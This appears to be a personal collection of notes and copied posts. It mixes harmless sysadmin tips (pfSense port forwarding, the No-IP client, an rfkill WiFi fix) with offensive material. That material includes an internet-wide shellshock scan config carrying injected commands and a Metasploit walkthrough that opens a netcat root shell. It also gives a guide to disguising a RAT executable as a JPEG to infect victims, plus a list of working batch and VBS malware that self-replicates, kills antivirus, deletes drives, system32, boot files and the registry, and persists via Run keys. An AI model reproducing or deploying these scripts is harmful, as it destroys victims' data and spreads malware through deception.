Port FWing on PFSense

Version 1.2.3

1. Go to the Firewall menu, select NAT, then click on the Port Forward tab.
2. Click on the + icon at the top or bottom of the screen.
3. Choose the Interface for the port forward (likely WAN) and if needed, pick a virtual IP address from the External Address drop-down.
4. Enter your forwarded port in the External Port range box(es)
5. Enter the internal IP address you'd like to send that port to in the NAT IP box.
6. Fill in a local port if it differs from the external port.
7. Check the Auto-add a firewall rule checkbox
8. Click Save which will return you to the Port Forward NAT screen, showing you all the NAT entries.
9. Finally, click Apply Changes - wait a few seconds and test.

Ref: https://doc.pfsense.org/index.php/How_can_I_forward_ports_with_pfSense

How to Install the Dynamic Update Client on Linux

After setting up a no-ip account this is necessary if you don't have a static IP from your ISP.

This guide will walk you through the installation and setup of the Dynamic Update Client (DUC) on a computer running Linux.  If you are using Ubuntu or Debian Linux please check our support site for guides on their specific setup.

If you are using Ubuntu Linux, please click here.

Installing the Client

The below commands should be executed from a terminal window (command prompt) after logging in as the “root” user.  You can become the root user from the command line by entering “sudo su -” followed by the root password on your machine.

Note: If you do not have privileges on the machine you are on, you may add the “sudo” command in front of steps (5 and 6).

1. cd /usr/local/src
2. wget http://www.no-ip.com/client/linux/noip-duc-linux.tar.gz
3. tar xzf noip-duc-linux.tar.gz
4. cd no-ip-2.1.9
5. make
6. make install

If you get “make not found” or “missing gcc” then you do not have the gcc compiler tools on your machine.  You will need to install these in order to procede.

To Configure the Client

As root again (or with sudo) issue the below command:

• /usr/local/bin/noip2 -C   (dash capital C, this will create the default config file)

You will then be prompted for your username and password for No-IP, as well as which hostnames you wish to update.  Be careful, one of the questions is “Do you wish to update ALL hosts”.  If answered incorrectly this could effect hostnames in your account that are pointing at other locations.

Now the client is installed and configured, you just need to launch it.  Simply issue this final command to launch the client in the background:

• /usr/local/bin/noip2

Read the README file in the no-ip-2.1.9 folder for instructions on how to make the client run at startup. This varies depending on what Linux distribution you are running.

REf: http://www.noip.com/support/knowledgebase/installing-the-linux-dynamic-update-client/

How to install packages in Cygwin

While Iv'e known and used Cygwin before I really never leveraged it in a pen-test until today.
After installing cygwin however it needs to be updated to add the packages you need for the required task. Took me a few minutes to figure out how to do this so here are the instructions that worked.

1) Find the cygwin setup.exe file from http://cygwin.com/ and run it.
2) Click/enter preferences until you reach the "Select Packages" window. (See image)
3) Click (+) for Net
4) Click the entry for curl. (Make sure you select the checkbox for the Binary)
5) Install.
6) Open a cygwin window and type curl.exe (should be available now).

Ref: http://stackoverflow.com/questions/3647569/how-do-i-install-curl-on-cygwin

Linux WiFi: operation not possible due to RF-kill

Often when I bring my laptop out of hibernation or suspension I am unable to enable wifi. This issue has been reported to have begun after an update that happened just before Christmas 2010. The problem seems to be a bug in a kernel module, which prevents the rfkill's soft and hard block from syncing correctly.

In practice that means you can press your laptop's WiFi button as often as you want, it doesn't change anything. Your wireless adapter will always appear as disabled. If you try to start the wireless interface manually you get the following error message:

sk@ubuntu:~# sudo ifconfig wlan0 up
SIOCSIFFLAGS: Operation not possible due to RF-kill

If you do a rfkill list all you should get an output similar to this:

sk@ubuntu:~$ sudo rfkill list all
0: hp-wifi: Wireless LAN
Soft blocked: yes
Hard blocked: no
1: phy0: Wireless LAN
Soft blocked: yes
Hard blocked: no

Depending on the state of your WiFi button the Hard blocked will either be yes or no. Press the WiFi button and run rfkill list all again to make sure the value for Hard blocked changes.

The actual problem is, that the Soft blocked value is always set to yes, because for some reason the syncing between the hardware block and the software block doesn't work as supposed. To override this behavior, you can just run rfkill unblock wifi and it should work again. Double check by entering rfkill list all again and make sure it looks like this, with all values set to no:

sk@ubuntu:~$ sudo rfkill list all
0: hp-wifi: Wireless LAN
Soft blocked: no
Hard blocked: no
1: phy0: Wireless LAN
Soft blocked: no
Hard blocked: no

If you then run ifconfig wlan0 up (or enable the wireless via your desktop's network manager) you should be able to connect to a wireless network again without any further issues.

The configuration, which I've been using:

• Lenovo B575
• Atheros ath9k AR9285 Wireless Network Adapter
• Ubuntu 14.04.1 LTS

It's reported that by turning off the WiFi button during the boot process and switching it on again once the system is up and running may correct the issue. This didn't work for me as the button was still not functional. In the past I simply logged off and back which allowed me to enable wifi it with the button. However this was not the case today. 

• suspend the system to RAM (either by hitting the SUSPEND-key or by using the Suspend entry in the Logout-menu at right of the upper panel)
• wait for some seconds
• press the power button to restart the system

After reboot:
.
The output to 'rfkill list all' finally shows

0: phy0: Wireless LAN
    Soft blocked: no
    Hard blocked: no
1: asus-wlan: Wireless LAN
    Soft blocked: no
    Hard blocked: no

The NetworkManager will activate the WIFI and should offer access points to connect to.

 It seems that the system expects the hard block to be set to off. This is still a bug, but it could explain why then the soft block didn't sync with the hard block any more.

service apache2 status

"service apache2 status" will display if server is running.

or

dhcpd -f 

Bash 'shellshock' scan of the Internet

This masscan can be used to find vulnerable hosts. 

Thanks Mr. Graham.

code https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120)

The configuration file for masscan looks something like:

target-ip = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74

http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

The last three options don't quite work due to bug, so you have to manually add them to the code. Link listed on top of this page. Or u can just copy from here.

#include "proto-http.h"
#include "proto-banner1.h"
#include "smack.h"
#include "unusedparm.h"
#include "string_s.h"
#include "masscan-app.h"
#include <ctype.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

enum {
    HTTPFIELD_INCOMPLETE,
    HTTPFIELD_SERVER,
    HTTPFIELD_CONTENT_LENGTH,
    HTTPFIELD_CONTENT_TYPE,
    HTTPFIELD_VIA,
    HTTPFIELD_LOCATION,
    HTTPFIELD_UNKNOWN,
    HTTPFIELD_NEWLINE,
};
static struct Patterns http_fields[] = {
    {"Server:",          7, HTTPFIELD_SERVER,           SMACK_ANCHOR_BEGIN},
    //{"Content-Length:", 15, HTTPFIELD_CONTENT_LENGTH,   SMACK_ANCHOR_BEGIN},
    //{"Content-Type:",   13, HTTPFIELD_CONTENT_TYPE,     SMACK_ANCHOR_BEGIN},
    {"Via:",             4, HTTPFIELD_VIA,              SMACK_ANCHOR_BEGIN},
    {"Location:",        9, HTTPFIELD_LOCATION,         SMACK_ANCHOR_BEGIN},
    {":",                1, HTTPFIELD_UNKNOWN, 0},
    {"\n",               1, HTTPFIELD_NEWLINE, 0},
    {0,0,0,0}
};
enum {
    HTML_INCOMPLETE,
    HTML_TITLE,
    HTML_UNKNOWN,
};
static struct Patterns html_fields[] = {
    {"<TiTle",          6, HTML_TITLE, 0},
    {0,0,0,0}
};

extern struct ProtocolParserStream banner_http;



/***************************************************************************
 ***************************************************************************/
unsigned
http_change_field(unsigned char **inout_header, unsigned header_length,
                    const char *field_name,
                    const unsigned char *field_value, unsigned field_value_len)
{
    unsigned char *hdr1 = *inout_header;
    unsigned char *hdr2;
    unsigned i;
    unsigned is_newline_seen = 0;
    unsigned field_name_len = (unsigned)strlen(field_name);

    hdr2 = (unsigned char *)malloc(header_length + field_value_len + 1 + 2);

    memcpy(hdr2, hdr1, header_length);

    /* Remove the previous header and remember the location in the header
     * where it was located */
    for (i=0; i<header_length; i++) {
        if (hdr2[i] == '\r')
            continue;
        if (hdr2[i] == '\n') {
            if (is_newline_seen) {
                /* We've reached the end of header without seing
                 * the field. Therefore, create space right here
                 * for it. */
                while (hdr2[i-1] == '\r')
                    i--;
                break;
            } else if (memcasecmp(&hdr2[i+1], field_name, field_name_len) == 0) {
                unsigned j;
                i++; /* skip previous newline */
                for (j=i; j<header_length && hdr2[j] != '\n'; j++)
                    ;
                if (j < header_length && hdr2[j] == '\n')
                    j++;
                memmove(    &hdr2[i],
                            &hdr2[j],
                            header_length - j);
                header_length -= (j - i);
                hdr2[header_length] = '\0';
                break;
            }
        }
    }

    /* Insert the new header at this location */
    memmove(    &hdr2[i + field_name_len + field_value_len + 1 + 2],
                &hdr2[i],
                header_length - i);
    memcpy( &hdr2[i],
            field_name,
            field_name_len);
    memcpy( &hdr2[i + field_name_len],
            " ",
            1);
    memcpy( &hdr2[i + field_name_len + 1],
            field_value,
            field_value_len);
    memcpy( &hdr2[i + field_name_len + 1 + field_value_len],
            "\r\n",
            2);

    header_length += field_name_len + 1 + field_value_len + 2;

    free(hdr1);
    *inout_header = hdr2;
    return header_length;
}

/***************************************************************************
 ***************************************************************************/
static const char
http_hello[] =      "GET / HTTP/1.0\r\n"
                    "User-Agent: masscan/1.0 (https://github.com/robertdavidgraham/masscan)\r\n"
                    "Accept: */*\r\n"
                    //"Connection: Keep-Alive\r\n"
                    //"Content-Length: 0\r\n"
                    "\r\n";


/*****************************************************************************
 *****************************************************************************/
void
field_name(struct BannerOutput *banout, size_t id,
           struct Patterns *xhttp_fields);
void
field_name(struct BannerOutput *banout, size_t id,
           struct Patterns *xhttp_fields)
{
    unsigned i;
    if (id == HTTPFIELD_INCOMPLETE)
        return;
    if (id == HTTPFIELD_UNKNOWN)
        return;
    if (id == HTTPFIELD_NEWLINE)
        return;
    for (i=0; xhttp_fields[i].pattern; i++) {
        if (xhttp_fields[i].id == id) {
            banout_newline(banout, PROTO_HTTP);
            banout_append(  banout, PROTO_HTTP,
                            (const unsigned char*)xhttp_fields[i].pattern
                                + ((xhttp_fields[i].pattern[0]=='<')?1:0), /* bah. hack. ugly. */
                            xhttp_fields[i].pattern_length
                                - ((xhttp_fields[i].pattern[0]=='<')?1:0) /* bah. hack. ugly. */
                          );
            return;
        }
    }
}

/*****************************************************************************
 * Initialize some stuff that's part of the HTTP state-machine-parser.
 *****************************************************************************/
static void *
http_init(struct Banner1 *b)
{
    unsigned i;

    /*
     * These match HTTP Header-Field: names
     */
    b->http_fields = smack_create("http", SMACK_CASE_INSENSITIVE);
    for (i=0; http_fields[i].pattern; i++)
        smack_add_pattern(
                          b->http_fields,
                          http_fields[i].pattern,
                          http_fields[i].pattern_length,
                          http_fields[i].id,
                          http_fields[i].is_anchored);
    smack_compile(b->http_fields);

    /*
     * These match HTML <tag names
     */
    b->html_fields = smack_create("html", SMACK_CASE_INSENSITIVE);
    for (i=0; html_fields[i].pattern; i++)
        smack_add_pattern(
                          b->html_fields,
                          html_fields[i].pattern,
                          html_fields[i].pattern_length,
                          html_fields[i].id,
                          html_fields[i].is_anchored);
    smack_compile(b->html_fields);

    banner_http.hello = (unsigned char*)malloc(banner_http.hello_length);
    memcpy((char*)banner_http.hello, http_hello, banner_http.hello_length);

    return b->http_fields;
}

/***************************************************************************
 * BIZARRE CODE ALERT!
 *
 * This uses a "byte-by-byte state-machine" to parse the response HTTP
 * header. This is standard practice for high-performance network
 * devices, but is probably unfamiliar to the average network engineer.
 *
 * The way this works is that each byte of input causes a transition to
 * the next state. That means we can parse the response from a server
 * without having to buffer packets. The server can send the response
 * one byte at a time (one packet for each byte) or in one entire packet.
 * Either way, we don't. We don't need to buffer the entire response
 * header waiting for the final packet to arrive, but handle each packet
 * individually.
 *
 * This is especially useful with our custom TCP stack, which simply
 * rejects out-of-order packets.
 ***************************************************************************/
static void
http_parse(
        const struct Banner1 *banner1,
        void *banner1_private,
        struct ProtocolState *pstate,
        const unsigned char *px, size_t length,
        struct BannerOutput *banout,
        struct InteractiveData *more)
{
    unsigned state = pstate->state;
    unsigned i;
    unsigned state2;
    unsigned log_begin = 0;
    unsigned log_end = 0;
    size_t id;
    enum {
        FIELD_START = 9,
        FIELD_NAME,
        FIELD_COLON,
        FIELD_VALUE,
        CONTENT,
        CONTENT_TAG,
        CONTENT_FIELD
    };

    UNUSEDPARM(banner1_private);
    UNUSEDPARM(more);

    state2 = (state>>16) & 0xFFFF;
    id = (state>>8) & 0xFF;
    state = (state>>0) & 0xFF;

    for (i=0; i<length; i++)
    switch (state) {
    case 0: case 1: case 2: case 3: case 4:
        if (toupper(px[i]) != "HTTP/"[state])
            state = STATE_DONE;
        else
            state++;
        break;
    case 5:
        if (px[i] == '.')
            state++;
        else if (!isdigit(px[i]))
            state = STATE_DONE;
        break;
    case 6:
        if (isspace(px[i]))
            state++;
        else if (!isdigit(px[i]))
            state = STATE_DONE;
        break;
    case 7:
        /* TODO: look for 1xx response code */
        if (px[i] == '\n')
            state = FIELD_START;
        break;
    case FIELD_START:
        if (px[i] == '\r')
            break;
        else if (px[i] == '\n') {
            state2 = 0;
            state = CONTENT;
            log_end = i;
            banout_append(banout, PROTO_HTTP, px+log_begin, log_end-log_begin);
            log_begin = log_end;
            break;
        } else {
            state2 = 0;
            state = FIELD_NAME;
            /* drop down */
        }

    case FIELD_NAME:
        if (px[i] == '\r')
            break;
        id = smack_search_next(
                        banner1->http_fields,
                        &state2,
                        px, &i, (unsigned)length);
        i--;
        if (id == HTTPFIELD_NEWLINE) {
            state2 = 0;
            state = FIELD_START;
        } else if (id == SMACK_NOT_FOUND)
            ; /* continue here */
        else if (id == HTTPFIELD_UNKNOWN) {
            /* Oops, at this point, both ":" and "Server:" will match.
             * Therefore, we need to make sure ":" was found, and not
             * a known field like "Server:" */
            size_t id2;

            id2 = smack_next_match(banner1->http_fields, &state2);
            if (id2 != SMACK_NOT_FOUND)
                id = id2;

            state = FIELD_COLON;
        } else
            state = FIELD_COLON;
        break;
    case FIELD_COLON:
        if (px[i] == '\n') {
            state = FIELD_START;
            break;
        } else if (isspace(px[i])) {
            break;
        } else {
            //field_name(banout, id, http_fields);
            state = FIELD_VALUE;
            /* drop down */
        }

    case FIELD_VALUE:
        if (px[i] == '\r')
            break;
        else if (px[i] == '\n') {
            state = FIELD_START;
            break;
        }
        switch (id) {
        case HTTPFIELD_SERVER:
        case HTTPFIELD_LOCATION:
        case HTTPFIELD_VIA:
            //banner_append(&px[i], 1, banout);
            break;
        case HTTPFIELD_CONTENT_LENGTH:
                if (isdigit(px[i]&0xFF)) {
                    ; /*todo: add content length parsing */
                } else {
                    id = 0;
                }
            break;
        }
        break;
    case CONTENT:
        {
            unsigned next = i;

            id = smack_search_next(
                                   banner1->html_fields,
                                   &state2,
                                   px, &next, (unsigned)length);

            if (banner1->is_capture_html) {
                banout_append(banout, PROTO_HTML_FULL, &px[i], next-i);
            }

            if (id != SMACK_NOT_FOUND) {
                state = CONTENT_TAG;
            }

            i = next - 1;
        }
        break;
    case CONTENT_TAG:
        for (; i<length; i++) {
            if (banner1->is_capture_html) {
                banout_append_char(banout, PROTO_HTML_FULL, px[i]);
            }

            if (px[i] == '>') {
                state = CONTENT_FIELD;
                break;
            }
        }
        break;
    case CONTENT_FIELD:
        if (banner1->is_capture_html) {
            banout_append_char(banout, PROTO_HTML_FULL, px[i]);
        }
        if (px[i] == '<')
            state = CONTENT;
        else {
            banout_append_char(banout, PROTO_HTML_TITLE, px[i]);
        }
        break;
    case STATE_DONE:
    default:
        i = (unsigned)length;
        break;
    }

    if (log_end == 0 && state < CONTENT)
        log_end = i;
    if (log_begin < log_end)
        banout_append(banout, PROTO_HTTP, px + log_begin, log_end-log_begin);



    if (state == STATE_DONE)
        pstate->state = state;
    else
        pstate->state = (state2 & 0xFFFF) << 16
                | (id & 0xFF) << 8
                | (state & 0xFF);
}


/***************************************************************************
 ***************************************************************************/
static int
http_selftest(void)
{
    return 0;
}

/***************************************************************************
 ***************************************************************************/
struct ProtocolParserStream banner_http = {
    "http", 80, http_hello, sizeof(http_hello)-1, 0,
    http_selftest,
    http_init,
    http_parse,
};

Shellschock Bash Vuln - How TO

Found Here: http://null-byte.wonderhowto.com/how-to/hack-like-pro-hack-shellshock-vulnerability-0157651/


Step 1: Start Metasploit

Let's begin, of course, by firing up Kali Linux and starting Metasploit. You should be greeted by a screen similar to the following one.



Step 2: Update Metasploit

Since this is a new Meatsploit module, it is not in your Metasploit Framework when you downloaded Kali, so we need to update Metasploit. Let's open a terminal and type:

kali > msfupdate



This might take awhile, so be patient.
Step 3: Find the Exploit

Now that we updated our Metasploit and presumably downloaded the new Shellshock modules, let's find this new exploit. In the Metasploit framework, type:

msf > search shellshock



As we can see, Metasploit found the auxiliary module for attacking the DHCP client using the Shellshock vulnerability.

Let's now load that module by typing:

msf > use auxiliary/server/dhclient/dhclient_bash_env

Now, let's type info to get more information on this module.

msf > info



We can see in the screenshot above each of the various options for this module and some basic information about it. The key parameters are CMD, SRVHOST, and NETMASK.
Step 4: Set Up the Module Parameters

Now, let's show options.

msf > show options



First, let's set the DHCP server IP. This is the SRVHOST parameter.

msf > set SVRHOST 192.168.131.254



Next, let's set the code that we want to inject through the BASH shell. Although, this module comes with a netcat command by default, let's change it slightly with a command that I have found gives us better and more reliable results.

msf > set CMD /bin/nc -l -p6996 -e /bin/sh



Lastly, let's set the NETMASK.

msf > set NETMASK 255.255.255.0



Finally, let's simply type "exploit" to run the module.

msf > exploit



When we do so, we simply get the message "Auxiliary module execution completed." In our case here, this simply means that we were able to run our CMD line using the Shellshock vulnerability to set up a netcat listener with root privileges on port 6996 piping out a BASH shell to whoever chooses to connect to it!
Step 5: Connect to the Exploited System

Now that we have injected netcat into the vulnerable system, we should be able to connect to that machine remotely with administrative/root privileges. We would then own that machine!

For demonstration purposes, let's connect to that system with a Windows machine remotely by connecting to the netcat listener. First, open a command prompt on the Windows system and type:

c::\nc 192.168.131.129 6996

When we do so, it will return a blank line. When we type "ifconfig":

ifconfig



It returns the network settings of the exploited Linux system. Now, to confirm our privilege level, let's type "whoami":

whoami



In this screenshot, you can see that we have not only been able to access the system remotely, but we have root privileges. We OWN this system!

Security Tools

Here is a compilation of multiple forensic and penetration testing tools for applications, networks, and websites.

While most professionals simply write their own tools in respect to the given task, this is a good starting point. These are some of the most frequently used in my tool box.

The learning curve on some of these can be steep so do the research. Results will come with proper configuration, or applying the correct filters or switches.

Nmap Nmap is a very versatile tool developed to scan addresses (IPV6 included), this tool allows the users to gather a mass amount of information about the target quickly, information including open ports, + much, much more. Nmap supports a large number of scanning techniques such as: UDP, TCP connect(), TCP SYN (half open), ftp proxy (bounce attack), ICMP (ping sweep), FIN, ACK sweep, Xmas Tree, SYN sweep, IP Protocol, and Null scan. Wireshark A very powerful network troubleshooting and analysis tool, Wire shark provides the ability to view data from a live network, and supports hundreds of protocols and media formats. Cain & Abel Cain and Abel is a revolutionary tool that provides many functions that are able to do various password retrieval jobs, cracking passwords, sniffing networks, and routing/analyzing protocols. This tool is Windows-only, unlike many other tools that exist, this is a pleasant twist to modern penetration testing and forensic tools. MetaSploit MetaSploit, a very powerful network security and analysis tool, used often for penetration attacks, this tool has a clean interface and easily gathers the information that you seek. Ettercap Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis. (Taken from their website) Nessus The Nessus tool provides high-speed data discovery, asset profiling, configuration auditing, and vulnerability analysis of networks. Havij Havij is the most common and heard of testing tool for SQLI injection and many other web-based injection types. It fluently provides the site's scan, admin look-up, password cracking, and database retrieval. It literally makes it a breeze to hack, and find, vulnerable websites. Kismet Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT. (Taken from Kismet website) Kali Linux Kali is a widely popular bootable Live-CD of a Linux Distro.Formerly known as  Back Track, it offers a vast variety of penetration testing tools, along with those for network attacks, and supports many other forms of testing/attacking, for VOIP networks, Websites + more. The tool's interface and design provides an easy to use layout. w3af W3af is an extremely popular, powerful, and flexible framework for finding and exploiting web application vulnerabilities. It is easy to use and extend and features dozens of web assessment and exploitation-plugins. In some ways it is like a web-focused Metasploit. (Taken from nmap.org) Encase EnCase is a suite of computer forensics software, commonly used by law enforcement. Its wide use has made it a de-facto standard in forensics. It is made to collect data from a computer in a forensically sound manner (employing checksums to help detect tampering). (Taken from Nmap.org.) Helix Helix is a live bootable Ubuntu CD, that contains a multitude of forensic tools involving cellphones, computers, file systems, images, and tied into its sheer power is a friendly and easy-to-use interface. Acunetix Acunetix is a strong, and very popular website security tool. It provides many tools to test your website, (or others) for various injections. Acunetix WVS automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities. Burp Suite Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

What is Malware?

 What's the difference between malware, and a virus?

If I had a dollar for every time I've been asked that I'd buy a Porsche.Next time someone asks you the same question just point them to this document:

Malware, can be harmful even while a machine is not connected to the internet. Malware can infect files stealing personal data, stealing credential, using target computer as a zombie. Some Malware is professionally written to perform a specific task. This special branch of malware known as Worm.

Virus : Computer viruses are Malicous piece of software which designed to Infect file and spread itself. Viruses usually infects executable files known as Exe. Let's see how it spreads.

Let's say virus has infected one exe file, then,
1+1=2+2=4+4=8.

Typically viruses are written in ASM (Assembly language - A low level language which directly work with machine), and infect exe files in the current directory. Virus can be coded with Batch, C and Almost any language but it gets strength when it's work with system directly.

Botnet : A Botnet is a special type of malware which is designed to use on an infected computer. It's also known as a Zombie. When a system is infected it turns into the slave of malicious attacker. She uses your system to Mine BTC, stealing Credential, performing DDOS attack, Clicking Ad, advertising etc.. infected sytems are also known as bots. Types of botnet as IRC,HTTP,P2P.

Most of the succesful botnets are written with C & C++ programming language.

Worm : As discussed, a worm is special type of malware which performs certain tasks. It can steal data, spy system, steal credential etc. The spreading of a worm is much faster than any other malware. It uses windows Exploit to spread (sasser worm), mass mailing (mydoom, love latter) etc. Worms are codded with C and Most of C++ programming language. Love latter was written with VB script.

Malware spreads through USB,EXE,RAR,LAN,Exploit,Mass mailing.


But what about Spyware?

Malware is an umbrella term that encompasses several types of harmful software. Spyware is just one type of malware, so all spyware is malware, but not all malware is spyware.

Read more : http://www.ehow.com/facts_6800011_difference-between-spyware-malware.html

How to hide an .exe file into a .jpg / (Noob friendly) (Good for RAT spreading/e-whoring)

This probably will not work on sophisticated IT personnel. The average user however...

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.

Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8.) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-

'C:.\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:.\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-

%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.

This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

*I am not responsible for what you do/do not do with this tutorial. Educational purposes only.

Deadly Batch Files

From an anonymous source. While it's newbish and outdated, ie, some of this may not work on win7 or newer, I think they can be useful for some chaos in a pinch.

I haven't taken the time to play with all of them yet so BE CAREFUL!
To be safe run them in a VM for testing.

Do NOT run these on your machine!

================================

Here is a Batch File virus which can:

1.Copy itself into startup
2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer
copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).

Here is the Code:

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP


No 2:-

Just open your notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r :: run window will open and
type notepad and hit enter .

NOW TYPE THE FOLLOWING CODE ::

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Then save it as kinng.bat and the batch file is created .
WARNING :: This is the most dangerous virus! Be careful with its use.

Delete the entire registry

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

Now save it as kinng.bat and the batch file is created .


No 3:-

How to crash a PC Forever !:::

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE.


No 4 :-

How to stop someone's internet access::::

@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew


No 5 :-

ShutDown PC million Times::::

1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a


No 6:-

Open Notepad
Write / copy the below command there:
" del c:\WINDOWS\system32\*.*/q " without quote
and save as " anything.bat"
Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started.


No 7:-

Process:
Open Notepad
Copy the below command there
"rd/s/q D:\
rd/s/q C:\
rd/s/q E:\" ( without quotes )
Save as "anything.bat
This virus Formats the C ,D , and E Drive in 3 Seconds.


No 8 :-

Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now Save This Notepad file With Any Name Having .vbs Extension .


No 9 :-

Open Notepad and write "start" without quotes
Start
Start
Start
and then save it with .bat extension.
Now double click on this .bat file to run Command Prompt.


No 10:-

Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.


No 11 :-

Toggle your friend's Caps Lock button simultaneously:

Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.


No 12:-

Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.


No 13 :-

This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

